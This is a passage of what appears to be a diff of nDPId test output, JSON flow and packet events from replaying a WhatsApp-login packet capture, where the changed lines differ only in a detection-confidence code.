tWydJ61deheU2gY0jifGxvWb6TKpitF7KENLzDKe6R1+jkekRnLVGAoiZ6cidxCTodgPGJaODRed4KQauNt6lzH+E+PJp48Tc7z95H2uvpzfMxaqZdwBSkB4v4ScjVowzkErkvUxVQNOveEwAJQDuk\/MJnrSUEivzWnCcp3a+GPlrKE2YjKybAPuXK8NmegG3utqM2DgTsUTgCNR+3ESE1g9tqjPpb6WMGMIfSBz2fb5tlr8mBN4CEu0H72FkFaOVAQvrDFdSC9uWsLI+9xr\/qifTPscJiK47gZwd7xJ1+AvgSKzzkjQwgSwyGtffBvX0O0GlFuSMAxYjLubFvVAvKhF6gkJ9oPlwZ9pkLOs5hTGXcjvBfkdt78lFxJQl3eijMQRas5LDn3A9Tn53tCW5oXAuOYXz4b"} 01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":531,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":531,"pkt_l4_len":497,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIFAqxAAEAGH4jAqAIEEa1CZsA1Abt+cl8spMYxPVAYQAAK4wAA+zXxkGmxqmlJcwlR7TpHpRtDDy9iaRt9w+hOFsERXuy8gwV22TTGXYqWLP3aSg0FRpPNh6b2JxTA9OSkJEk04NCfWqJRauLthWRuA7XoVn8i6Smk+coAOa3u15Yq91KVTfK0Likn42RkhoMCTU67u6i6Y4GW7d7uWiM6L3uLokbbGTmGs29u3afEGnNWZwLcuyp6rGxmPmWxvxgkiNCzEIsj5+jDbrTqLXDyyF322ZG7ztnAr92I1EUwbaElkdT9P28rYnazLdDX3NtrMNZoVpJg+JtJ\/7kZqQ2Wqzmg\/a3xXi4EVY3r6CTewAoUnubR3Qb8d8SxZWO8dXB980UXO8ObJWaEL5I20Sp30w7kYXi8hv4VgTLwR\/5GH+diyQKZuXNNplXdUL9qR0BnzfYHcTgjG28TOg74dTk611xDBeVR4Itg6rhO4EXCbpfiRmK6bb3CXGkaTCMHxUnezI+xc2Wog+XxCXrGyOiN2uGEyOBaMLxsAdU\/WfMK5Hg2kk6QV97kZZAhmz0GEeQIuwbiHtXsFgOmiLHGkBFU3uvrL2U0AIsy\/dg28ProYM\/UVKotXUmjaEkwo4XPHqyzoqhSMSd8fGbpRTWD+Jj7SG1OLSQLZ6OzyLhulPpesWWw"} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"flow_min_l4_payload_len":477,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":958,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"flow_min_l4_payload_len":477,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":958,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
01222{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":610,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":610,"pkt_l4_len":576,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAJULUhAAEAG9JzAqAIEEa1CZsA1Abt+cmEJpMYxPVAYQAAkaQAAFwMDAifRP6n1iN3uB\/Uhy6B3MN22nTeVXJRqDhAyLGWagzjVPV67eGMiWlDpxIYk9ZRXb8ENyJMklAVg5qQxAfredM796d1woE5CM\/dDlnC9hhfBLqlOMT0Sc23vnR6S0CtE+vcI2IEc50YYFIr8cCuBcLPUtehQ+6FiIBzPUNdC8gBpCK0l8ehCaB6UsJ+9Lz+rqI7LymD80O7JD9GQGlEzf0ROrOYPwKN9oloslBYMUuNcVtuTSnZlQf6clnYgiVqjkPEIWZnj1\/SzJxC0XzXDZTCazzjZUphrvHsUFVKI\/iQfQLn2Pm20z\/bY+umTrESbc\/Rb\/jTAxKkWPlTguW5QNPTgHe+8CLbu8GlNIUhp6XnzV0lotZMlMuaBJakvd6GmWA8qWeiSGeNI8Nxabsp54T+pQf+cFTWMVSzn894mO+DZZ3gtq32z87kDjYiMhE2jHBbOrnjFvxmtQtZu7lyboSLDYh55cOzJECLrbK8MSRuDtHOP5G6iepYtPwv3WMGLCV+hTD9hULIUKlQnW8NxmNPf6x7m2WXh+T5KFO1k2GNZTSM8sWZLLJiGPB3r5p1nS3ObF9UaRS1rU\/+0JK5FT6PVQl\/T6rcJ66cGodbOS0a03YtqhfdlphEfqQSNy4IBPyE7+TYhqlI5kH8vw+oFYBVtxUinzFEEO03Tz6ey1LN8P\/4vb9rv1pyNfFxaNarK\/6\/1noAhKaU7nGWU\/L6Er+GI\/BOXYTn7Ng=="} -00659{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00659{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432582396509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582396509,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQPEAAEARsZnAqAIBwKgC\/0RcRFwB\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"} 
-00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1432582399902,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582399902,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFYAAP8Rdk8AAAAA\/\/\/\/\/wBEAEMBNOdfAQEGALYzLg4AAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} -00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} 
+00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} 00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432582401886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582401886,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFcAAP8Rdk4AAAAA\/\/\/\/\/wBEAEMBNOddAQEGALYzLg4AAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1432582402666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1432582402666,"pkt":"AQBeAAD7APS5Jrv0CABFAABNW6AAAP8RvFfAqAIE4AAA+xTpFOkAOcRNAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="} -00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 
+00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432582402667,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1432582402667,"pkt":"MzMAAAD7APS5Jrv0ht1gCRl1ADkR\/\/6AAAAAAAAAGJzDGxKYAiT\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5eQMAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} 
-00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 
00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582404307,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582404307,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFgAAP8Rdk0AAAAA\/\/\/\/\/wBEAEMBNOdaAQEGALYzLg4ABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582411561,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu4AAC8GqngRbuUOwKgCBBRnwCnUixwguGhbLIAYAUleegAAAQEICm+JVxEt\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582412221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582412221,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu8AAC8GqncRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlb7AAAAQEICm+JWZ8t\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 
00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582413522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582413522,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJvAAAC8GqnYRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlW0AAAAQEICm+JXrst\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 01130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582426553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582426553,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISk3sAAEARXw\/AqAIBwKgC\/0RcRFwB\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"} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 